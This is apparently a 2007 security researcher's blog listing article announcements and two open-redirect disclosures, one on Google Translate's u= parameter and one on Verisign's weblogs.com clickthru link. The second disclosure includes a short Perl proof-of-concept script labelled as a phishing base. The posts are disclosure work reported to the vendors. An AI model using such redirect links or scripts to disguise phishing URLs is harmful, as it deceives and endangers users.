The new article Exploiting JSON Framework has been released at Metaeye and
Mlabs.The article gets in news at CGISecurity.
Links:
http://www.metaeye.org/articles
http://zeroknock.metaeye.org/mlabs/expjson.html
http://www.cgisecurity.com/2007/01/14
[Zknk]
Posted on 1/28/2007 03:29:00 AM by 0kn0ck | 0 Comments
The mlabs is onrun now.The lab holds the prime
work of mine.
http://zeroknock.metaeye.org/mlabs
[Zknk]
Posted on 1/27/2007 04:05:00 AM by 0kn0ck | 0 Comments
The infection vectors in JUMP is featured at packetstorm security and in news at cgisecurity.
Links:
http://www.cgisecurity.com/2007/01/12
http://www.packetstormsecurity.org/filedesc/InfVecInJUMP.pdf.html
[Zknk]
Posted on 1/24/2007 01:25:00 AM by 0kn0ck | 0 Comments
The new article infection vectors in JUMP has been released at metaeye security portal.
Link:
http://www.metaeye.org/category/articles/
[Zknk]
Posted on 1/22/2007 11:56:00 PM by 0kn0ck | 0 Comments
The research paper gets feaured at packetstorm security portal
Link: http://www.packetstormsecurity.org/filedesc/CogMetaSpamBug.pdf.html
[Zknk]
Posted on 1/16/2007 12:33:00 AM by 0kn0ck | 0 Comments
The research paper on the specified topic has been released.You can check this on:
http://www.metaeye.org
[Zknk]
Posted on 1/15/2007 02:17:00 AM by 0kn0ck | 0 Comments
The open movement for thought leadership.
check it:
http://www.apostropheor1equals1dashdash.com/
[Zknk]
Posted on 1/11/2007 12:11:00 AM by 0kn0ck | 0 Comments
The very definitve article RogueXmlSpecification is in news at CgiSecurity.
Check:
http://www.cgisecurity.com/2007/01/05
[Zknk]
Posted on 1/10/2007 09:54:00 AM by 0kn0ck | 0 Comments
Proof Of Analysis:
The translate google is a service that is provided by google to translate web pages to the desired language.The prime functioning depends on the factor that a web page of different language is selected and translate in to user specific choice.
The definitive URL as mentioned:
http://translate.google.com/translate?hl=en&sl=ja&u=
If we strip the parameter arguments it will be undertaken as:
hl=> The language in which translation to be done
sl=> The Source language
u=> The URL to be translated
Since the redirection vulnerability persist in the layout as if we strip off the parameters
of [hl]& [sl] and provide direct Url to the parameter [u] it redirects thetraffic in the
domain context.
The default parameter URL:
http://translate.google.com/translate?hl=en&sl=ja&u=
The stripped Off parameter URL:
http://translate.google.com/translate?u=
Example:
http://translate.google.com/translate?u=http://www.packetstormsecurity.org
Note:It has been reported to Google.
Posted on 1/10/2007 07:37:00 AM by 0kn0ck | 0 Comments
The Verisign Weblogs Redirection advisory at packetsorm security.
Check:
http://www.packetstormsecurity.org/filedesc/veredirect.txt.html
[Zknk]
Posted on 1/06/2007 11:34:00 PM by 0kn0ck | 0 Comments
I was surfing the web where i found this link.The article breaching front end security which i have written previously featured at Ecinox Forums.
Check the link:
http://www.ecinox.com/foruk/index.php?topic=393.0
[Zknk]
Posted on 1/06/2007 08:18:00 AM by 0kn0ck | 0 Comments
Posted on 1/04/2007 07:41:00 AM by 0kn0ck | 0 Comments
The weblogs is a verisign service for currently updating the blogs and provide requisits information to the users of specific blog which has been updated.
The weblog can act as a base for redirection attacks because traffic gets easily redirected from the website. This ensures weakness in a way if the URL is used by the third party it still redirects the traffic.No doubt if the link is clicked form the website it directs to the required destination but if is filtered fully than third party wont set the redirection easily.But thats not a case here.
The third party can easily manipulate the traffic.
The Required URL which is affected is :
http://www.weblogs.com/clickthru?url=
Example : Get To Google Via Weblogs.com
http://www.weblogs.com/clickthru?url=http://www.google.com
Proof Of Concept Script In Perl:
use STRICT;
print "[*] Phishing Base : Verisign Weblogs.com\n";
print "[*] POC By: Zeroknock [at] Metaeye.Org\n\n";
print "[*] Note : Set Firefox In The Default Path As Path=\n\n";
die "[*] Usage : $0 \n[*] $0 http://www.slashdot.org\n" unless @ARGV==1;
my $exploited_url="http://www.weblogs.com/clickthru?url=";
print "[*] Base URL : $exploited_url \n";
my $website_hit = $ARGV[0];
print "[*] Redirected URL : $website_hit\n";
my $phishing = $exploited_url.$website_hit;
print "[*] Phishing URL : $phishing\n";
system("firefox $phishing");
print "[*] Firefox Fired!\n";
print "[*] Redirection Successfull!\n";
This script automatically redirects traffic from the Weblogs site.
Note : The issue has already been reported to the Verisign.
A alert has been undertaken.Acc to verisign they considered
it not as vulnerability.But the reality is displayed in front.
It is a result of improper filtering on the website.
[Zknk]
Posted on 1/01/2007 10:29:00 PM by 0kn0ck | 0 Comments
The mlabs is onrun now.The lab holds the prime
The new article infection vectors in JUMP has been released at metaeye security portal.
The research paper gets feaured at packetstorm security portal
The research paper on the specified topic has been released.You can check this on:
The open movement for thought leadership.
The very definitve article RogueXmlSpecification is in news at CgiSecurity.
Proof Of Analysis:
The Verisign Weblogs Redirection advisory at packetsorm security.
I was surfing the web where i found this link.The article breaching front end security which i have written previously featured at Ecinox Forums.
The Ebay Online Attack Jargon gets featured at packettsormsecuirty portal.You can get to the resource
The weblogs is a verisign service for currently updating the blogs and provide requisits information to the users of specific blog which has been updated.
